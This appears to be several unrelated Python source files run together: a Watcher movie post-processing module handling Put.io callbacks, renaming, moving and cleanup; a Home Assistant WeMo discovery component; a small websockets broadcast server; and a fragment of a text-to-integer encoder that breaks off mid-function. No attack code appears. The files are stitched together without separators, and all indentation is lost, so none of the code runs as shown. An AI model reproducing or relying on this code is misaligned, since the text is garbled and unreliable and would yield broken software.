from core import plugins, snatcher
from core.library import Metadata, Manage
from core.downloaders import PutIO
logging = logging.getLogger(__name__)
class Postprocessing(object):
def __init__(self):
shutil.copystat = self.null
def null(*args, **kwargs):
return
@cherrypy.expose
def putio_process(self, *args, **transfer_data):
''' Method to handle postprocessing callbacks from Put.io
Gets called from Put.IO when download completes via POST request including download
metadata as transfer_data kwargs.
Sample kwargs:
{
"apikey": "APIKEY",
"percent_done": "100",
"peers_getting_from_us": "0",
"completion_percent": "0",
"seconds_seeding": "0",
"current_ratio": "0.00",
"created_torrent": "False",
"size": "507637",
"up_speed": "0",
"callback_url": "http://MYDDNS/watcher/postprocessing/putio_process?apikey=APIKEY",
"source": "<full magnet uri including trackers>",
"peers_connected": "0",
"down_speed": "0",
"is_private": "False",
"id": "45948956", # Download ID
"simulated": "True",
"type": "TORRENT",
"save_parent_id": "536510251",
"file_id": "536514172", # Put.io file ID #
"download_id": "21596709",
"torrent_link": "https://api.put.io/v2/transfers/<transferid>/torrent",
"finished_at": "2018-04-09 04:13:58",
"status": "COMPLETED",
"downloaded": "0",
"extract": "False",
"name": "<download name>",
"status_message": "Completed",
"created_at": "2018-04-09 04:13:57",
"uploaded": "0",
"peers_sending_to_us": "0"
}
'''
logging.info('########################################')
logging.info('PUT.IO Post-processing request received.')
logging.info('########################################')
conf = core.CONFIG['Downloader']['Torrent']['PutIO']
data = {'downloadid': str(transfer_data['id'])}
if transfer_data['source'].startswith('magnet'):
data['guid'] = transfer_data['source'].split('btih:')[1].split('&')[0]
else:
data['guid'] = None
data.update(self.get_movie_info(data))
if conf['downloadwhencomplete']:
logging.info('Downloading Put.IO files and processing locally.')
download = PutIO.download(transfer_data['file_id'])
if not download['response']:
logging.error('PutIO processing failed.')
return
data['path'] = download['path']
data['original_file'] = self.get_movie_file(data['path'])
data.update(self.complete(data))
if data['status'] == 'finished' and conf['deleteafterdownload']:
data['tasks']['delete_putio'] = PutIO.delete(transfer_data['file_id'])
else:
logging.info('Marking guid as Finished.')
guid_result = {}
if data['guid']:
if Manage.searchresults(data['guid'], 'Finished'):
guid_result['update_SEARCHRESULTS'] = True
else:
guid_result['update_SEARCHRESULTS'] = False
if Manage.markedresults(data['guid'], 'Finished', imdbid=data['imdbid']):
guid_result['update_MARKEDRESULTS'] = True
else:
guid_result['update_MARKEDRESULTS'] = False
# create result entry for guid
data['tasks'][data['guid']] = guid_result
# update MOVIES table
if data.get('imdbid'):
db_update = {'finished_file': 'https://app.put.io/files/{}'.format(transfer_data['file_id']), 'status': 'finished'}
core.sql.update_multiple_values('MOVIES', db_update, 'imdbid', data['imdbid'])
title = data['data'].get('title')
year = data['data'].get('year')
imdbid = data['data'].get('imdbid')
resolution = data['data'].get('resolution')
rated = data['data'].get('rated')
original_file = data['data'].get('original_file')
finished_file = data['data'].get('finished_file')
downloadid = data['data'].get('downloadid')
finished_date = data['data'].get('finished_date')
quality = data['data'].get('quality')
plugins.finished(title, year, imdbid, resolution, rated, original_file, finished_file, downloadid, finished_date, quality)
logging.info('#################################')
logging.info('Post-processing complete.')
logging.info(data)
logging.info('#################################')
@cherrypy.expose
@cherrypy.tools.json_out()
def default(self, **data):
''' Handles post-processing requests.
**data: keyword params send through POST request payload
Required kw params:
apikey (str): Watcher api key
mode (str): post-processing mode (complete, failed)
guid (str): download link of file. Can be url or magnet link.
path (str): absolute path to downloaded files. Can be single file or dir
Optional kw params:
imdbid (str): imdb identification number (tt123456)
downloadid (str): id number from downloader
While processing many variables are produced to track files through renaming, moving, etc
Perhaps the most important name is data['finished_file'], which is the current name/location
of the file being processed. This is updated when renamed, moved, etc.
Returns dict of post-processing tasks and data
'''
logging.info('#################################')
logging.info('Post-processing request received.')
logging.info('#################################')
# check for required keys
for key in ('apikey', 'mode', 'guid', 'path'):
if key not in data:
logging.warning('Missing key {}'.format(key))
return {'response': False, 'error': 'missing key: {}'.format(key)}
# check if api key is correct
if data['apikey'] != core.CONFIG['Server']['apikey']:
logging.warning('Incorrect API key.')
return {'response': False, 'error': 'incorrect api key'}
# check if mode is valid
if data['mode'] not in ('failed', 'complete'):
logging.warning('Invalid mode value: {}.'.format(data['mode']))
return {'response': False, 'error': 'invalid mode value'}
logging.debug(data)
# modify path based on remote mapping
data['path'] = self.map_remote(data['path'])
# get the actual movie file name
data['original_file'] = self.get_movie_file(data['path'], check_size=False if data['mode'] == 'failed' else True)
data['parent_dir'] = os.path.basename(os.path.dirname(data['original_file'])) if data.get('original_file') else ''
if not data['original_file']:
logging.warning('Movie file not found')
data['mode'] = 'failed'
# Get possible local data or get TMDB data to merge with self.params.
logging.info('Gathering release information.')
data.update(self.get_movie_info(data))
# At this point we have all of the information we're going to get.
if data['mode'] == 'failed':
logging.warning('Post-processing as Failed.')
response = self.failed(data)
elif data['mode'] == 'complete':
logging.info('Post-processing as Complete.')
if 'task' not in data:
directory = core.CONFIG['Postprocessing']['Scanner']['directory']
if data['path'] == directory:
core.sql.save_postprocessed_path(data['original_file'])
else:
core.sql.save_postprocessed_path(data['path'])
response = self.complete(data)
response['data'].pop('backlog', '')
response['data'].pop('predb', '')
response['data'].pop('source', '')
title = response['data'].get('title')
year = response['data'].get('year')
imdbid = response['data'].get('imdbid')
resolution = response['data'].get('resolution')
rated = response['data'].get('rated')
original_file = response['data'].get('original_file')
finished_file = response['data'].get('finished_file')
downloadid = response['data'].get('downloadid')
finished_date = response['data'].get('finished_date')
quality = response['data'].get('quality')
plugins.finished(title, year, imdbid, resolution, rated, original_file, finished_file, downloadid, finished_date, quality)
else:
logging.warning('Invalid mode value: {}.'.format(data['mode']))
return {'response': False, 'error': 'invalid mode value'}
logging.info('#################################')
logging.info('Post-processing complete.')
logging.info(json.dumps(response, indent=2, sort_keys=True))
logging.info('#################################')
return response
def get_movie_file(self, path, check_size=True):
''' Looks for the filename of the movie being processed
path (str): url-passed path to download dir
If path is a file, just returns path.
If path is a directory, recursively finds the largest file in that dir.
Returns str absolute path of movie file
'''
logging.info('Finding movie file.')
if os.path.isfile(path):
logging.info('Post-processing file {}.'.format(path))
return path
else:
# Find the biggest file in the dir. Assume that this is the movie.
biggestfile = None
try:
s = 0
for root, dirs, filenames in os.walk(path):
for file in filenames:
f = os.path.join(root, file)
logging.debug('Found file {} in postprocessing dir.'.format(f))
size = os.path.getsize(f)
if size > s:
biggestfile = f
s = size
except Exception as e: # noqa
logging.warning('Unable to find file to process.', exc_info=True)
return None
if biggestfile:
minsize = core.CONFIG['Postprocessing']['Scanner']['minsize'] * 1048576
if check_size and os.path.getsize(os.path.join(path, biggestfile)) < minsize:
logging.info('Largest file in directory {} is {}, but is smaller than the minimum size of {} bytes'.format(path, biggestfile, minsize))
return None
logging.info('Largest file in directory {} is {}, processing this file.'.format(path, biggestfile.replace(path, '')))
else:
logging.warning('Unable to determine largest file. Postprocessing may fail at a later point.')
return biggestfile
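# --- Illustrative sketch (not part of the original module) -----------------
# The heart of get_movie_file() is a "largest file wins" walk. A standalone
# stdlib-only equivalent would look roughly like this:
#
#   import os
#
#   def largest_file(path):
#       best, best_size = None, -1
#       for root, _dirs, files in os.walk(path):
#           for name in files:
#               full = os.path.join(root, name)
#               size = os.path.getsize(full)
#               if size > best_size:
#                   best, best_size = full, size
#       return best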
def get_movie_info(self, data):
''' Gets score, imdbid, and other information to help process
data (dict): url-passed params with any additional info
Uses guid to look up local details.
If that fails, uses downloadid.
If that fails, searches tmdb for imdbid
If everything fails returns empty dict {}
Returns dict of any gathered information
'''
# try to get searchresult imdbid using guid first then downloadid
result = None
if data.get('guid'):
logging.info('Searching local database for guid.')
result = core.sql.get_single_search_result('guid', data['guid'])
if result:
logging.info('Local release info found by guid.')
else:
logging.info('Unable to find local release info by guid.')
if not result: # not found from guid
logging.info('Guid not found.')
if data.get('downloadid'):
logging.info('Searching local database for downloadid.')
result = core.sql.get_single_search_result('downloadid', str(data['downloadid']))
if result:
logging.info('Local release info found by downloadid.')
if result['guid'] != data['guid']:
logging.info('Guid for downloadid does not match local data. Adding guid2 to processing data.')
data['guid2'] = result['guid']
else:
logging.info('Unable to find local release info by downloadid.')
if not result: # not found from guid or downloadid
fname = os.path.basename(data.get('path'))
if fname:
logging.info('Searching local database for release name {}'.format(fname))
result = core.sql.get_single_search_result('title', fname)
if result:
logging.info('Found match for {} in releases.'.format(fname))
else:
logging.info('Unable to find local release info by release name, trying fuzzy search.')
result = core.sql.get_single_search_result('title', re.sub(r'[\[\]\(\)\-.:]', '_', fname), like=True)
if result:
logging.info('Found match for {} in releases.'.format(fname))
else:
logging.info('Unable to find local release info by release name.')
# if we found it, get local movie info
if result:
logging.info('Searching local database by imdbid.')
local = core.sql.get_movie_details('imdbid', result['imdbid'])
if local:
logging.info('Movie data found locally by imdbid.')
data.update(local)
data['guid'] = result['guid']
data['finished_score'] = result['score']
data['resolution'] = result['resolution']
data['downloadid'] = result['downloadid']
else:
logging.info('Unable to find movie in local db.')
# Still no luck? Try to get the info from TMDB
else:
logging.info('Unable to find local data for release. Using only data found from file.')
if data and data.get('original_file'):
mdata = Metadata.from_file(data['original_file'], imdbid=data.get('imdbid'))
mdata.update(data)
if not mdata.get('quality'):
data['quality'] = 'Default'
return mdata
elif data:
return data
else:
return {}
def failed(self, data):
''' Post-process a failed download
data (dict): of gathered data from downloader and localdb/tmdb
In SEARCHRESULTS marks guid as Bad
In MARKEDRESULTS:
Creates or updates entry for guid and optional guid2 with status=Bad
Updates MOVIES status
If Clean Up is enabled will delete path and contents.
If Auto Grab is enabled will grab next best release.
Returns dict of post-processing results
'''
config = core.CONFIG['Postprocessing']
# dict we will json.dump and send back to downloader
result = {}
result['status'] = 'finished'
result['data'] = data
result['tasks'] = {}
# mark guid in both results tables
logging.info('Marking guid as Bad.')
guid_result = {'url': data['guid']}
if data['guid']: # guid can be empty string
if Manage.searchresults(data['guid'], 'Bad'):
guid_result['update_SEARCHRESULTS'] = True
else:
guid_result['update_SEARCHRESULTS'] = False
if Manage.markedresults(data['guid'], 'Bad', imdbid=data['imdbid']):
guid_result['update_MARKEDRESULTS'] = True
else:
guid_result['update_MARKEDRESULTS'] = False
# create result entry for guid
result['tasks']['guid'] = guid_result
# if we have a guid2, do it all again
if 'guid2' in data.keys():
logging.info('Marking guid2 as Bad.')
guid2_result = {'url': data['guid2']}
if Manage.searchresults(data['guid2'], 'Bad'):
guid2_result['update_SEARCHRESULTS'] = True
else:
guid2_result['update_SEARCHRESULTS'] = False
if Manage.markedresults(data['guid2'], 'Bad', imdbid=data['imdbid']):
guid2_result['update_MARKEDRESULTS'] = True
else:
guid2_result['update_MARKEDRESULTS'] = False
# create result entry for guid2
result['tasks']['guid2'] = guid2_result
# set movie status
if data['imdbid']:
logging.info('Setting MOVIE status.')
r = Manage.movie_status(data['imdbid'])
else:
logging.info('Imdbid not supplied or found, unable to update Movie status.')
r = ''
result['tasks']['update_movie_status'] = r
# delete failed files
if config['cleanupfailed']:
result['tasks']['cleanup'] = {'enabled': True, 'path': data['path']}
logging.info('Deleting leftover files from failed download.')
if self.cleanup(data['path']) is True:
result['tasks']['cleanup']['response'] = True
else:
result['tasks']['cleanup']['response'] = False
else:
result['tasks']['cleanup'] = {'enabled': False}
# grab the next best release
if core.CONFIG['Search']['autograb']:
result['tasks']['autograb'] = {'enabled': True}
logging.info('Grabbing the next best release.')
if data.get('imdbid') and data.get('quality'):
best_release = snatcher.get_best_release(data)
if best_release and snatcher.download(best_release):
r = True
else:
r = False
else:
r = False
result['tasks']['autograb']['response'] = r
else:
result['tasks']['autograb'] = {'enabled': False}
# all done!
result['status'] = 'finished'
return result
def complete(self, data):
''' Post-processes a complete, successful download
data (dict): all gathered file information and metadata
data must include the following keys:
path (str): path to downloaded item. Can be file or directory
guid (str): nzb guid or torrent hash
downloadid (str): download id from download client
All params can be empty strings if unknown
In SEARCHRESULTS marks guid as Finished
In MARKEDRESULTS:
Creates or updates entry for guid and optional guid2 with status=Finished
In MOVIES updates finished_score and finished_date
Updates MOVIES status
Checks to see if we found a movie file. If not, ends here.
If Renamer is enabled, renames movie file according to core.CONFIG
If Mover is enabled, moves file to location in core.CONFIG, then...
If Clean Up enabled, deletes path after Mover finishes.
Clean Up will not execute without Mover success.
Returns dict of post-processing results
'''
config = core.CONFIG['Postprocessing']
# dict we will json.dump and send back to downloader
result = {}
result['status'] = 'incomplete'
result['data'] = data
result['data']['finished_date'] = str(datetime.date.today())
result['tasks'] = {}
# mark guid in both results tables
logging.info('Marking guid as Finished.')
data['guid'] = data['guid'].lower()
guid_result = {}
if data['guid'] and data.get('imdbid'):
if Manage.searchresults(data['guid'], 'Finished', movie_info=data):
guid_result['update_SEARCHRESULTS'] = True
else:
guid_result['update_SEARCHRESULTS'] = False
if Manage.markedresults(data['guid'], 'Finished', imdbid=data['imdbid']):
guid_result['update_MARKEDRESULTS'] = True
else:
guid_result['update_MARKEDRESULTS'] = False
# create result entry for guid
result['tasks'][data['guid']] = guid_result
# if we have a guid2, do it all again
if data.get('guid2') and data.get('imdbid'):
logging.info('Marking guid2 as Finished.')
guid2_result = {}
if Manage.searchresults(data['guid2'], 'Finished', movie_info=data):
guid2_result['update_SEARCHRESULTS'] = True
else:
guid2_result['update_SEARCHRESULTS'] = False
if Manage.markedresults(data['guid2'], 'Finished', imdbid=data['imdbid']):
guid2_result['update_MARKEDRESULTS'] = True
else:
guid2_result['update_MARKEDRESULTS'] = False
# create result entry for guid2
result['tasks'][data['guid2']] = guid2_result
# set movie status and add finished date/score
if data.get('imdbid'):
if core.sql.row_exists('MOVIES', imdbid=data['imdbid']):
data['category'] = core.sql.get_movie_details('imdbid', data['imdbid'])['category']
else:
logging.info('{} not found in library, adding now.'.format(data.get('title')))
data['status'] = 'Disabled'
Manage.add_movie(data)
logging.info('Setting MOVIE status.')
r = Manage.movie_status(data['imdbid'])
db_update = {'finished_date': result['data']['finished_date'], 'finished_score': result['data'].get('finished_score')}
core.sql.update_multiple_values('MOVIES', db_update, 'imdbid', data['imdbid'])
else:
logging.info('Imdbid not supplied or found, unable to update Movie status.')
r = ''
result['tasks']['update_movie_status'] = r
data.update(Metadata.convert_to_db(data))
# mover. sets ['finished_file']
if config['moverenabled']:
result['tasks']['mover'] = {'enabled': True}
response = self.mover(data)
if not response:
result['tasks']['mover']['response'] = False
else:
data['finished_file'] = response
result['tasks']['mover']['response'] = True
else:
logging.info('Mover disabled.')
data['finished_file'] = data.get('original_file')
result['tasks']['mover'] = {'enabled': False}
# renamer
if config['renamerenabled']:
result['tasks']['renamer'] = {'enabled': True}
new_file_name = self.renamer(data)
if new_file_name == '':
result['tasks']['renamer']['response'] = False
else:
path = os.path.split(data['finished_file'])[0]
data['finished_file'] = os.path.join(path, new_file_name)
result['tasks']['renamer']['response'] = True
else:
logging.info('Renamer disabled.')
result['tasks']['renamer'] = {'enabled': False}
if data.get('imdbid') and data['imdbid'] != 'N/A':
core.sql.update('MOVIES', 'finished_file', result['data'].get('finished_file'), 'imdbid', data['imdbid'])
# Delete leftover dir. Skip if file links are enabled or if mover disabled/failed
if config['cleanupenabled']:
result['tasks']['cleanup'] = {'enabled': True}
if config['movermethod'] in ('copy', 'hardlink', 'symboliclink'):
logging.info('File copy or linking enabled -- skipping Cleanup.')
result['tasks']['cleanup']['response'] = None
return result
elif os.path.isfile(data['path']):
logging.info('Download is file, not directory -- skipping Cleanup.')
result['tasks']['cleanup']['response'] = None
return result
# fail if mover disabled or failed
if config['moverenabled'] is False or result['tasks']['mover']['response'] is False:
logging.info('Mover either disabled or failed -- skipping Cleanup.')
result['tasks']['cleanup']['response'] = None
else:
if self.cleanup(data['path']):
r = True
else:
r = False
result['tasks']['cleanup']['response'] = r
else:
result['tasks']['cleanup'] = {'enabled': False}
# all done!
result['status'] = 'finished'
return result
def map_remote(self, path):
''' Alters directory based on remote mappings settings
path (str): path from download client
Replaces the base of the file tree with the 'local' mapping.
Ie, '/home/user/downloads/Watcher' becomes '//server/downloads/Watcher'
'path' can be file or directory, it doesn't matter.
If more than one match is found, defaults to the longest path.
remote: local = '/home/users/downloads/': '//server/downloads/'
'/home/users/downloads/Watcher/': '//server/downloads/Watcher/'
In this case, a supplied remote '/home/users/downloads/Watcher/' will match a
startswith() for both supplied settings. So we will default to the longest path.
Returns str new path
'''
maps = core.CONFIG['Postprocessing']['RemoteMapping']
matches = []
for remote in maps.keys():
if path.startswith(remote):
matches.append(remote)
if not matches:
return path
else:
match = max(matches, key=len)
new_path = path.replace(match, maps[match])
logging.info('Changing remote path from {} to {}'.format(path, new_path))
return new_path
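# --- Illustrative sketch (not part of the original module) -----------------
# map_remote() is a longest-prefix substitution. With a hypothetical mapping
# table, a standalone equivalent looks like:
#
#   maps = {
#       '/home/user/downloads/': '//server/downloads/',
#       '/home/user/downloads/Watcher/': '//server/downloads/Watcher/',
#   }
#
#   def map_remote(path, maps):
#       matches = [remote for remote in maps if path.startswith(remote)]
#       if not matches:
#           return path
#       match = max(matches, key=len)   # prefer the most specific mapping
#       return path.replace(match, maps[match])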
def compile_path(self, string, data, is_file=False):
''' Compiles string to file/path names
string (str): brace-formatted string to substitute values (ie '/movies/{title}/')
data (dict): of values to sub into string
is_file (bool): if path is a file, false if directory
Takes a renamer/mover path and adds values.
ie '{title} {year} {resolution}' -> 'Movie 2017 1080P'
Subs double spaces. Trims trailing spaces. Removes any invalid characters.
Can return blank string ''
Sends string to self.sanitize() to remove illegal characters
Returns str new path
'''
new_string = string
for k, v in data.items():
k = '{' + k + '}'
if k in new_string:
new_string = new_string.replace(k, (v or ''))
while ' ' in new_string:
new_string = new_string.replace(' ', ' ')
if not is_file:
new_string = self.map_remote(new_string).strip()
logging.debug('Created path "{}" from "{}"'.format(new_string, string))
return self.sanitize(new_string, is_file=is_file)
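# --- Illustrative sketch (not part of the original module) -----------------
# compile_path() substitutes {key} tokens from the metadata dict. For example,
# with hypothetical values:
#
#   data = {'title': 'Example Movie', 'year': '2017', 'resolution': '1080P'}
#   template = '{title} ({year}) {resolution}'
#   # after substitution, whitespace cleanup and sanitizing:
#   # 'Example Movie (2017) 1080P'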
def renamer(self, data):
''' Renames movie file based on renamerstring.
data (dict): movie information.
Renames movie file based on params in core.CONFIG
Returns str new file name (blank string on failure)
'''
logging.info('## Renaming Downloaded Files')
config = core.CONFIG['Postprocessing']
renamer_string = config['renamerstring']
# check to see if we have a valid renamerstring
if re.match(r'{(.*?)}', renamer_string) is None:
logging.info('Invalid renamer string {}'.format(renamer_string))
return ''
# existing absolute path
path = os.path.split(data['finished_file'])[0]
# get the extension
ext = os.path.splitext(data['finished_file'])[1]
# get the new file name
new_name = self.compile_path(renamer_string, data, is_file=True)
if not new_name:
logging.info('New file name would be blank. Cancelling renamer.')
return ''
if core.CONFIG['Postprocessing']['replacespaces']:
new_name = new_name.replace(' ', '.')
new_name = new_name + ext
logging.info('Renaming {} to {}'.format(os.path.basename(data.get('original_file')), new_name))
try:
os.rename(data['finished_file'], os.path.join(path, new_name))
except (SystemExit, KeyboardInterrupt):
raise
except Exception as e: # noqa
logging.error('Renamer failed: Could not rename file.', exc_info=True)
return ''
# return the new name so the mover knows what our file is
return new_name
def recycle(self, recycle_bin, abs_filepath):
''' Sends file to recycle bin dir
recycle_bin (str): absolute path to recycle bin directory
abs_filepath (str): absolute path of file to recycle
Creates recycle_bin dir if necessary.
Moves file to recycle bin. If a file with the same name already
exists, overwrites existing file.
Returns bool
'''
file_dir, file_name = os.path.split(abs_filepath)
if not os.path.isdir(recycle_bin):
logging.info('Creating recycle bin directory {}'.format(recycle_bin))
try:
os.makedirs(recycle_bin)
except Exception as e:
logging.error('Recycling failed: Could not create Recycle Bin directory {}.'.format(recycle_bin), exc_info=True)
return False
logging.info('Recycling {} to recycle bin {}'.format(abs_filepath, recycle_bin))
try:
if os.path.isfile(os.path.join(recycle_bin, file_name)):
os.remove(os.path.join(recycle_bin, file_name))
shutil.move(abs_filepath, recycle_bin)
return True
except Exception as e: # noqa
logging.error('Recycling failed: Could not move file.', exc_info=True)
return False
def remove_additional_files(self, movie_file):
''' Removes additional associated files of movie_file
movie_file (str): absolute file path of old movie file
Removes any file in original_file's directory that share the same file name
Does not cause mover failure on error.
Returns bool
'''
logging.info('## Removing additional files for {}'.format(movie_file))
path, file_name = os.path.split(movie_file)
fname = os.path.splitext(file_name)[0]
for i in os.listdir(path):
name = os.path.splitext(i)[0]
no_lang_name = None
# check if filename ends with .<2-char-lang-code>
if re.search(r'\.[a-z]{2}$', name, re.I):
no_lang_name = os.path.splitext(name)[0]
if name == fname or no_lang_name == fname:
logging.info('Removing additional file {}'.format(i))
try:
os.remove(os.path.join(path, i))
except Exception as e: # noqa
logging.warning('Unable to remove {}'.format(i), exc_info=True)
return False
return True
def mover(self, data):
'''Moves movie file to path constructed by moverstring
data (dict): movie information.
Moves file to location specified in core.CONFIG
If target file already exists either:
Delete it prior to copying new file in (since os.rename in windows doesn't overwrite)
OR:
Create Recycle Bin directory (if necessary) and move the old file there.
Copies and renames additional files
Returns str new file location (blank string on failure)
'''
logging.info('## Moving Downloaded Files')
config = core.CONFIG['Postprocessing']
if config['recyclebinenabled']:
recycle_bin = self.compile_path(config['recyclebindirectory'], data)
category = data.get('category', None)
if category in core.CONFIG['Categories']:
moverpath = core.CONFIG['Categories'][category]['moverpath']
else:
moverpath = config['moverpath']
target_folder = os.path.normpath(self.compile_path(moverpath, data))
target_folder = os.path.join(target_folder, '')
# if the new folder doesn't exist, make it
try:
if not os.path.exists(target_folder):
os.makedirs(target_folder)
except Exception as e:
logging.error('Mover failed: Could not create directory {}.'.format(target_folder), exc_info=True)
return ''
current_file_path = data['original_file']
current_path, file_name = os.path.split(current_file_path)
# If finished_file exists, recycle or remove
if data.get('finished_file'):
old_movie = data['finished_file']
logging.info('Checking if old file {} exists.'.format(old_movie))
if os.path.isfile(old_movie):
if config['recyclebinenabled']:
logging.info('Old movie file found, recycling.')
if not self.recycle(recycle_bin, old_movie):
return ''
else:
logging.info('Deleting old file {}'.format(old_movie))
try:
os.remove(old_movie)
except Exception as e:
logging.error('Mover failed: Could not delete file.', exc_info=True)
return ''
if config['removeadditionalfiles']:
self.remove_additional_files(old_movie)
# Check if the target file name exists in target dir, recycle or remove
if os.path.isfile(os.path.join(target_folder, file_name)):
existing_movie_file = os.path.join(target_folder, file_name)
logging.info('Existing file {} found in {}'.format(file_name, target_folder))
if config['recyclebinenabled']:
if not self.recycle(recycle_bin, existing_movie_file):
return ''
else:
logging.info('Deleting old file {}'.format(existing_movie_file))
try:
os.remove(existing_movie_file)
except Exception as e:
logging.error('Mover failed: Could not delete file.', exc_info=True)
return ''
if config['removeadditionalfiles']:
self.remove_additional_files(existing_movie_file)
# Finally the actual move process
new_file_location = os.path.join(target_folder, os.path.basename(data['original_file']))
if config['movermethod'] == 'hardlink':
logging.info('Creating hardlink from {} to {}.'.format(data['original_file'], new_file_location))
try:
os.link(data['original_file'], new_file_location)
except Exception as e:
logging.error('Mover failed: Unable to create hardlink.', exc_info=True)
return ''
elif config['movermethod'] == 'copy':
logging.info('Copying {} to {}.'.format(data['original_file'], new_file_location))
try:
shutil.copy(data['original_file'], new_file_location)
except Exception as e:
logging.error('Mover failed: Unable to copy movie.', exc_info=True)
return ''
else:
logging.info('Moving {} to {}'.format(current_file_path, new_file_location))
try:
shutil.copyfile(current_file_path, new_file_location)
os.unlink(current_file_path)
except Exception as e:
logging.error('Mover failed: Could not move file.', exc_info=True)
return ''
if config['movermethod'] == 'symboliclink':
if core.PLATFORM == 'windows':
logging.warning('Attempting to create symbolic link on Windows. This will fail without SeCreateSymbolicLinkPrivilege.')
logging.info('Creating symbolic link from {} to {}'.format(new_file_location, data['original_file']))
try:
os.symlink(new_file_location, data['original_file'])
except Exception as e:
logging.error('Mover failed: Unable to create symbolic link.', exc_info=True)
return ''
keep_extensions = [i.strip() for i in config['moveextensions'].split(',') if i != '']
if len(keep_extensions) > 0:
logging.info('Moving additional files with extensions {}.'.format(','.join(keep_extensions)))
compiled_name = self.compile_path(config['renamerstring'], data)
for root, dirs, filenames in os.walk(data['path']):
for name in filenames:
old_abs_path = os.path.join(root, name)
fname, ext = os.path.splitext(name) # ('filename', '.ext')
# check if filename ends with .<2-char-lang-code>
if re.search(r'\.[a-z]{2}$', fname, re.I):
fname, lang = os.path.splitext(fname)
target_ext = lang + ext
else:
target_ext = ext
if config['renamerenabled']:
fname = compiled_name
target_file = '{}{}'.format(os.path.join(target_folder, fname), target_ext)
if ext.replace('.', '') in keep_extensions:
append = 0
while os.path.isfile(target_file):
append += 1
new_filename = '{}({})'.format(fname, str(append))
target_file = '{}{}'.format(os.path.join(target_folder, new_filename), target_ext)
try:
logging.info('Moving {} to {}'.format(old_abs_path, target_file))
shutil.copyfile(old_abs_path, target_file)
except Exception as e: # noqa
logging.error('Moving additional files failed: Could not copy {}.'.format(old_abs_path), exc_info=True)
return new_file_location
def cleanup(self, path):
''' Deletes specified path
        path (str): path to remove
path can be file or dir
Returns bool
'''
# if its a dir
if os.path.isdir(path):
try:
shutil.rmtree(path)
return True
except Exception as e:
logging.error('Could not delete path.', exc_info=True)
return False
elif os.path.isfile(path):
# if its a file
try:
os.remove(path)
return True
except Exception as e: # noqa
logging.error('Could not delete path.', exc_info=True)
return False
else:
# if it is somehow neither
return False
def sanitize(self, string, is_file=False):
''' Sanitize file names and paths
string (str): to sanitize
Removes all illegal characters or replaces them based on
user's config.
Returns str
'''
config = core.CONFIG['Postprocessing']
repl = config['replaceillegal']
if is_file:
string = re.sub(r'[\/"*?<>|:]+', repl, string)
else:
string = re.sub(r'["*?<>|]+', repl, string)
drive, path = os.path.splitdrive(string)
path = path.replace(':', repl)
return ''.join([drive, path])
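
# A minimal illustration (not part of the original class) of the two regexes
# used by sanitize() above, assuming '-' as the configured replacement
# character (normally core.CONFIG['Postprocessing']['replaceillegal']). File
# names also lose ':' and '/', while plain paths keep separators and the drive
# colon.
def _sanitize_regex_demo():
    import re
    repl = '-'
    # file-name rule: strip / " * ? < > | :
    assert re.sub(r'[\/"*?<>|:]+', repl, 'Who? What: Where*') == 'Who- What- Where-'
    # path rule: keep ':' and '/', strip " * ? < > |
    assert re.sub(r'["*?<>|]+', repl, 'D:/movies/What? (2021)') == 'D:/movies/What- (2021)'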
|
the-stack_0_1583 | """
Support for WeMo device discovery.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/wemo/
"""
import logging
from homeassistant.components.discovery import SERVICE_WEMO
from homeassistant.helpers import discovery
from homeassistant.const import EVENT_HOMEASSISTANT_STOP
REQUIREMENTS = ['pywemo==0.4.3']
DOMAIN = 'wemo'
# Mapping from Wemo model_name to component.
WEMO_MODEL_DISPATCH = {
'Bridge': 'light',
'Insight': 'switch',
'Maker': 'switch',
'Sensor': 'binary_sensor',
'Socket': 'switch',
'LightSwitch': 'switch'
}
SUBSCRIPTION_REGISTRY = None
KNOWN_DEVICES = []
_LOGGER = logging.getLogger(__name__)
# pylint: disable=unused-argument, too-many-function-args
def setup(hass, config):
"""Common setup for WeMo devices."""
import pywemo
global SUBSCRIPTION_REGISTRY
SUBSCRIPTION_REGISTRY = pywemo.SubscriptionRegistry()
SUBSCRIPTION_REGISTRY.start()
def stop_wemo(event):
"""Shutdown Wemo subscriptions and subscription thread on exit."""
_LOGGER.info("Shutting down subscriptions.")
SUBSCRIPTION_REGISTRY.stop()
hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP, stop_wemo)
def discovery_dispatch(service, discovery_info):
"""Dispatcher for WeMo discovery events."""
# name, model, location, mac
_, model_name, _, _, serial = discovery_info
# Only register a device once
if serial in KNOWN_DEVICES:
return
_LOGGER.debug('Discovered unique device %s', serial)
KNOWN_DEVICES.append(serial)
component = WEMO_MODEL_DISPATCH.get(model_name, 'switch')
discovery.load_platform(hass, component, DOMAIN, discovery_info,
config)
discovery.listen(hass, SERVICE_WEMO, discovery_dispatch)
_LOGGER.info("Scanning for WeMo devices.")
devices = [(device.host, device) for device in pywemo.discover_devices()]
# Add static devices from the config file.
devices.extend((address, None)
for address in config.get(DOMAIN, {}).get('static', []))
for address, device in devices:
port = pywemo.ouimeaux_device.probe_wemo(address)
if not port:
_LOGGER.warning('Unable to probe wemo at %s', address)
continue
_LOGGER.info('Adding wemo at %s:%i', address, port)
url = 'http://%s:%i/setup.xml' % (address, port)
if device is None:
device = pywemo.discovery.device_from_description(url, None)
discovery_info = (device.name, device.model_name, url, device.mac,
device.serialnumber)
discovery.discover(hass, SERVICE_WEMO, discovery_info)
return True
|
the-stack_0_1584 | #!/usr/bin/env python
import asyncio
import websockets
import time
import threading
connections=set()
def mandar():
global connections
vPrint=True
while True:
if len(connections)>0:
print(connections)
            mensaje=input("Enter a message to broadcast: ")
if mensaje!="u":
websockets.broadcast(connections,mensaje)
vPrint=True
elif vPrint:
print("Conexiones: ")
print(connections)
vPrint=False
async def handler(websocket):
global connections
connections.add(websocket)
await websocket.wait_closed()
connections.remove(websocket)
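
# A minimal client sketch (not part of the original script) for this broadcast
# server. It assumes the same host/port that main() below passes to
# websockets.serve(), and simply prints every broadcast frame until the
# connection closes. Run it from a separate process with:
#   asyncio.run(_demo_client())
async def _demo_client(uri="ws://172.24.50.15:8765"):
    async with websockets.connect(uri) as websocket:
        async for message in websocket:  # each broadcast arrives as one message
            print("received:", message)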
async def main():
threading.Thread (target=mandar).start()
async with websockets.serve(handler, "172.24.50.15", 8765):
await asyncio.Future() # run forever..
if __name__ == "__main__":
asyncio.run(main()) |
the-stack_0_1585 | import random
def int2bin_str(d):
return bin(d)[2:]
def txt2int(s):
result = ''
for c in s:
result += '{:03d}'.format(ord(c))
if result.startswith('0'):
result = '999' + result
return int(result)
def int2txt(d):
s = str(d)
if len(s) % 3 != 0:
print('bad int')
return
result = ''
